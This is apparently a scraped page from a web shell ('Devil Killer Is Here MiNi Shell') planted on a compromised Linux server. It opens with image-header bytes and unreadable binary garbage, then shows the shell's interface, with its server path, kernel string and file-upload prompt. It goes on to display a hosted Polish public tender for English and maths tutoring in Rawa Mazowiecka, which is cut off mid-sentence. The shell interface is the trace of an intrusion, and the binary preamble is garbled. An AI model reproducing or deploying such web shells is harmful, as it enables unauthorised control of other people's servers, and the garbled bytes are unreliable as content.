JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221108/0042952701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja i realizacja korepetycji wyrównujących szanse edukacyjne dla uczestników projektu pn. &#34;CUŚ DOBREGO!&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 750192303</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kościuszki 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rawa Mazowiecka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">96-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL715 - Skierniewicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">46 814 57 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">46 814 57 60</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pomost@powiatrawski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.pcpr.powiatrawski.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja i realizacja korepetycji wyrównujących szanse edukacyjne dla uczestników projektu pn. &#34;CUŚ DOBREGO!&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e5b75d72-5f5d-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00429527</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00058816/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 &#34;Organizacja i realizacja korepetycji wyrównujących szanse edukacyjne dla uczestników projektu pn. &#34;CUŚ DOBREGO!&#34; współfinansowanego z Europejskiego Funduszu Społecznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> &#34;CUŚ DOBREGO!&#34; wspólfinansowany z Eropejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łodzkiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.powiatrawski.pl/122,powiatowe-centrum-pomocy-rodzinie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji i przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/><br/>1.	Administratorem Pani/Pana danych osobowych jest Powiat Rawski, ul. Pl. Kościuszki 1, 96-200 Rawa Mazowiecka.<br/>1.1 Administratorem Pani/Pana danych osobowych jest Powiatowe Centrum Pomocy Rodzinie w Rawie Mazowieckiej , ul. Kościuszki 5, 96-200 Rawa Mazowiecka.<br/>2.	W sprawach ochrony Pani/Pana danych można kontaktować się z wyznaczonym Inspektorem Ochrony Danych pod adresem e-mail: mpa@powiatrawski.pl<br/>2.1	W sprawach ochrony Pani/Pana danych można kontaktować się z wyznaczonym Inspektorem Ochrony Danych pod adresem e-mail: pcpr@powiatrawski.pl <br/>Pozostałe zapisy dotyczące RODO zostały zawarte w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCPR.26.3.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Udzielenie indywidualnych korepetycji z języka angielskiego dla 28 uczestników projektu „CUŚ DOBREGO!”. <br/>Łączna maksymalna liczba godzin.: 140 w miesiącu, nie więcej niż 1 120 godzin w okresie realizacji zamówienia (ilość godzin przypadająca na 1 uczestnika w miesiącu: nie więcej niż 5 ).<br/>Szczegółowy opis zadania:<br/>•	korepetycje powinny odbywać się w miejscu zamieszkania każdego z uczestników (na terenie powiatu rawskiego), bądź też w siedzibie realizatora projektu tj. Powiatowego Centrum Pomocy Rodzinie w Rawie Mazowieckiej, ul. Kościuszki 5, 96-200 Rawa Mazowiecka. Dokumentem poświadczającym przeprowadzenie korepetycji jest własnoręczny podpis uczestnika/opiekuna na liście obecności. <br/>•	W sytuacji zagrożenia epidemiologicznego, korepetycje mogą być prowadzone w trybie on-line, za pomocą dostępnych komunikatorów (skype, whats upp, zoom, Times) lub innych aplikacji, które Wykonawca udostępni nieodpłatnie Uczestnikom projektu. Jeżeli Uczestnik projektu nie może korzystać z aplikacji lub komunikatora, zaproponowanego przez Wykonawcę, Wykonawca ma obowiązek zapewnić możliwość korzystania przez Uczestnika z korepetycji w systemie on-line w sposób zapewniający uczestnictwo i korzystanie z formy wsparcia. Dokumentem, potwierdzającym wykonanie usługi będzie elektroniczne potwierdzenie (e-mail), z chwilą rozpoczęcia i zakończenia świadczenia usługi (skan podpisanej listy obecności przesłanej przez e-mail) lub screan z prowadzonych zajęć. W przypadku osób, które z różnych przyczyn nie są w stanie posługiwać się w pełni komunikacją elektroniczną, możliwe jest archiwizowanie potwierdzeń zgłaszania się tych osób na różnego rodzaju komunikatorach wybranych do kontaktu z w/w uczestnikami. Mając na względzie dobro i bezpieczeństwo uczestników jak i pracowników rekomenduje się honorowanie różnego rodzaju dokumentów, oświadczeń, list obecności. Podpis na oryginale dokumentu, potwierdzającego wykonanie usługi, w miarę możliwości można zebrać od uczestników po ustaniu zagrożenia epidemiologicznego w kraju.<br/>•	Harmonogram zajęć zostanie ustalony z opiekunem uczestnika w porozumieniu z Zamawiającym. Wykonawca jest zobowiązany przedstawić Zamawiającemu harmonogram realizowanych zajęć dla Wszystkich uczestników co najmniej na 7 dni przed rozpoczęciem miesiąca, którego harmonogram dotyczy. W szczególnych okolicznościach w porozumieniu z Zamawiającym w/w termin może ulec zmianie. <br/>•	Wykonawca zobowiązany jest do udokumentowania przeprowadzonych korepetycji tj.: prowadzenia karty czasu pracy, listy obecności z każdego dnia korepetycji, dzienniku zajęć, dla każdej osoby, które to dokumenty będą oznaczone znakiem Funduszy Europejskich (FE) oraz znakiem Unii Europejskiej (UE) a także oficjalnym logiem promocyjnym województwa łódzkiego, zgodnie z zasadami zawartymi w Księdze identyfikacji wizualnej znaku marki Fundusze Europejskie i znaków programów polityki spójności na lata 2014-2020, zamieszczonej na stronie Wojewódzkiego Urzędu Pracy w Łodzi zgodnie z projektem Zamawiającego i przedłożone Zamawiającemu po zakończeniu zajęć.<br/>•	Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne wśród wszystkich uczestników zajęć, oceniające zajęcia na koniec realizacji zajęć i sporządzi z nich raport.<br/>Termin realizacji zadania: od dnia zawarcia umowy do dnia 23.06.2023r. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja będzie polegać na zwiększeniu liczby godzin łącznie maksymalnie liczba godzin może zostać zwiększona o 140 godzin w miesiącu, nie więcej niż 420 godzin w okresie realizacji zamówienia (ilość godzin przypadająca na 1 uczestnika w miesiącu: nie więcej niż 5).<br/>Zamawiający może skorzystać z opcji w przypadku przedłużenia realizacji projektu pn: „CUŚ DOBREGO!” współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami: <br/> A. cena jednostkowa za 1 h- C - 90 %<br/>B. klauzula społeczna - K – 10 %<br/><br/>Oferty oceniane będą punktowo. Maksymalna liczba punktów, jaką po uwzględnieniu wagi może osiągnąć oferta wynosi 100 pkt.<br/><br/>OPIS SZCZEGÓŁOWY DLA KRYTERIUM CENA<br/>Kryterium cena (C) - waga 90%<br/>Kryterium będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w ofercie.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/><br/>Najniższa cena jednostkowa brutto za 1h<br/>C = ---------------------------------------- x 90<br/>Cena jednostkowa brutto za 1 h badanej oferty<br/><br/> C – ilość punktów przyznana w kryterium cena<br/>Przy ocenie w kryterium „cena” najwyżej będzie punktowana oferta z najniższą ceną jednostkową brutto.<br/><br/>OPIS SZCZEGÓŁOWY DLA KRYTERIUM KLAUZULA SPOŁECZNA<br/> Kryterium klauzuli społecznej K– waga 10%<br/><br/> Oferta otrzyma 0 pkt za brak zatrudnienia osoby spełniającej warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/><br/> Oferta otrzyma 5 pkt za zatrudnienie 1 osoby spełniającej warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/><br/> Oferta otrzyma 10 pkt za zatrudnienie ≤ 2 osób spełniających warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/>Za osoby z niepełnosprawnościami, zgodnie z definicją wynikającą z Wytycznych w zakresie realizacji zasady równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami oraz zasady równości szans kobiet i mężczyzn w ramach funduszy unijnych na lata 2014-2020 Ministra Infrastruktury i Rozwoju z dnia 5 kwietnia 2018r., uważa się osoby niepełnosprawne w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2018 r., poz. 511), a także osoby z zaburzeniami psychicznymi, w rozumieniu ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (Dz. U. z 2017 r., poz. 882 z późn.zm.).<br/><br/>Za osobę bezrobotną, uważa się osobę, o której mowa w art. 2 ust. 1 pkt 2 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r. (tj. Dz. U. z 2022r. poz. 690 z późn. zm.).<br/><br/>Za osoby, o których mowa w przepisach o zatrudnieniu socjalnym, uważa się osoby, o których mowa w ustawie o zatrudnieniu socjalnym z dnia 13 czerwca 2003 r. (tj. Dz. U. 2020 r., poz. 176 z późn.zm.).<br/><br/>Punkty za kryterium klauzula społeczna zostaną przyznane na podstawie oświadczenia o spełnieniu klauzuli społecznej (Załącznik Nr 1 do SWZ). Wykonawca zobowiązuje się przy tym do utrzymania zatrudnienia w/w osób na zadeklarowanym poziomie przez cały okres obowiązywania umowy z Zamawiającym, jak również do przekazania na żądanie Zamawiającego informacji i dokumentów o ogólnej liczbie osób zatrudnionych oraz liczbie zatrudnionych osób z niepełnosprawnościami, osób bezrobotnych lub takich o których mowa w przepisach o zatrudnieniu socjalnym lub dokumentów potwierdzających spełnienie tych warunków<br/><br/>Zamawiający w ramach każdego pakietu dokona wyboru oferty tego z Wykonawców, która uzyska w wyniku oceny ofert najwyższą liczbę punktów. Przyznanie punktów poszczególnym ofertom odbędzie się w oparciu o następujący wzór:<br/><br/>Ocena oferty = C + K<br/><br/>7Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taką samą liczbę punktów, Zamawiający wybierze ofertę z najniższą ceną.<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>Najkorzystniejszą ofertę, Zamawiający wybierze spośród ofert nie odrzuconych.<br/><br/>Ocena będzie dokonywana oddzielnie dla poszczególnych części zamówienia.<br/><br/>Szczegółowy opis oceny ofert znajduje się w Dziale XXVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Udzielenie indywidualnych korepetycji z matematyki dla 24 uczestników projektu „CUŚ DOBREGO!”. <br/>Łączna maksymalna liczba godzin.: 120 w miesiącu, nie więcej niż 360 godzin w okresie realizacji zamówienia (ilość godzin przypadająca na 1 uczestnika w miesiącu: nie więcej niż 5).<br/>Szczegółowy opis zadania: <br/>•	korepetycje powinny odbywać się w miejscu zamieszkania każdego z uczestników (na terenie powiatu rawskiego), bądź też w siedzibie realizatora projektu tj. Powiatowego Centrum Pomocy Rodzinie w Rawie Mazowieckiej, ul. Kościuszki 5, 96-200 Rawa Mazowiecka. Dokumentem poświadczającym przeprowadzenie korepetycji jest własnoręczny podpis uczestnika/opiekuna na liście obecności. <br/>•	W sytuacji zagrożenia epidemiologicznego, korepetycje mogą być prowadzone w trybie on-line, za pomocą dostępnych komunikatorów (skype, whats upp, zoom, Times) lub innych aplikacji, które Wykonawca udostępni nieodpłatnie Uczestnikom projektu. Jeżeli Uczestnik projektu nie może korzystać z aplikacji lub komunikatora, zaproponowanego przez Wykonawcę, Wykonawca ma obowiązek zapewnić możliwość korzystania przez Uczestnika z korepetycji w systemie on-line w sposób zapewniający uczestnictwo i korzystanie z formy wsparcia. Dokumentem, potwierdzającym wykonanie usługi będzie elektroniczne potwierdzenie (e-mail), z chwilą rozpoczęcia i zakończenia świadczenia usługi (skan podpisanej listy obecności przesłanej przez e-mail) lub screan z prowadzonych zajęć. W przypadku osób, które z różnych przyczyn nie są w stanie posługiwać się w pełni komunikacją elektroniczną, możliwe jest archiwizowanie potwierdzeń zgłaszania się tych osób na różnego rodzaju komunikatorach wybranych do kontaktu z w/w uczestnikami. Mając na względzie dobro i bezpieczeństwo uczestników jak i pracowników rekomenduje się honorowanie różnego rodzaju dokumentów, oświadczeń, list obecności. Podpis na oryginale dokumentu, potwierdzającego wykonanie usługi, w miarę możliwości można zebrać od uczestników po ustaniu zagrożenia epidemiologicznego w kraju.<br/>•	Harmonogram zajęć zostanie ustalony z opiekunem uczestnika w porozumieniu z Zamawiającym. Wykonawca jest zobowiązany przedstawić Zamawiającemu harmonogram realizowanych zajęć dla Wszystkich uczestników co najmniej na 7 dni przed rozpoczęciem miesiąca, którego harmonogram dotyczy. W szczególnych okolicznościach w porozumieniu z Zamawiającym w/w termin może ulec zmianie. <br/>•	Wykonawca zobowiązany jest do udokumentowania przeprowadzonych korepetycji tj.: prowadzenia karty czasu pracy, listy obecności z każdego dnia korepetycji, dzienniku zajęć, dla każdej osoby, które to dokumenty będą oznaczone znakiem Funduszy Europejskich (FE) oraz znakiem Unii Europejskiej (UE) a także oficjalnym logiem promocyjnym województwa łódzkiego, zgodnie z zasadami zawartymi w Księdze identyfikacji wizualnej znaku marki Fundusze Europejskie i znaków programów polityki spójności na lata 2014-2020, zamieszczonej na stronie Wojewódzkiego Urzędu Pracy w Łodzi zgodnie z projektem Zamawiającego i przedłożone Zamawiającemu po zakończeniu zajęć.<br/>•	Wykonawca zobowiązany jest przeprowadzić ankiety ewaluacyjne wśród wszystkich uczestników zajęć, oceniające zajęcia na koniec realizacji zajęć i sporządzi z nich raport.<br/><br/>Termin realizacji zadania : od dnia zawarcia umowy do dnia 23.06.2023r.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Opcja będzie polegać na zwiększeniu liczby godzin łącznie maksymalnie liczba godzin może zostać zwiększona o 120 godzin w miesiącu, nie więcej niż 360 godzin w okresie realizacji zamówienia (ilość godzin przypadająca na 1 uczestnika w miesiącu: nie więcej niż 5).<br/>Zamawiający może skorzystać z opcji w przypadku przedłużenia realizacji projektu pn: „CUŚ DOBREGO!” współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020 <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami: <br/> A. cena jednostkowa za 1 h- C - 90 %<br/>B. klauzula społeczna - K – 10 %<br/><br/>Oferty oceniane będą punktowo. Maksymalna liczba punktów, jaką po uwzględnieniu wagi może osiągnąć oferta wynosi 100 pkt.<br/><br/>OPIS SZCZEGÓŁOWY DLA KRYTERIUM 